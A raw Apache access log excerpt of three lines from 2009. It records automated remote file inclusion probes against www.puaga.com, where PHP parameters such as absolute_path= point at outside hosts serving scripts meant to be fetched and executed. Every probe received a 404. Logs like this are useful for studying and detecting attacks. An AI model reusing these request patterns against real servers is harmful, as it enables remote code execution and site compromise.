72.82.228.83 - - [05/Jul/2009:11:28:00 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:28:00 -0700] "GET /components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:11:28:19 -0700] "GET /logs///modules/errors.php?error=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
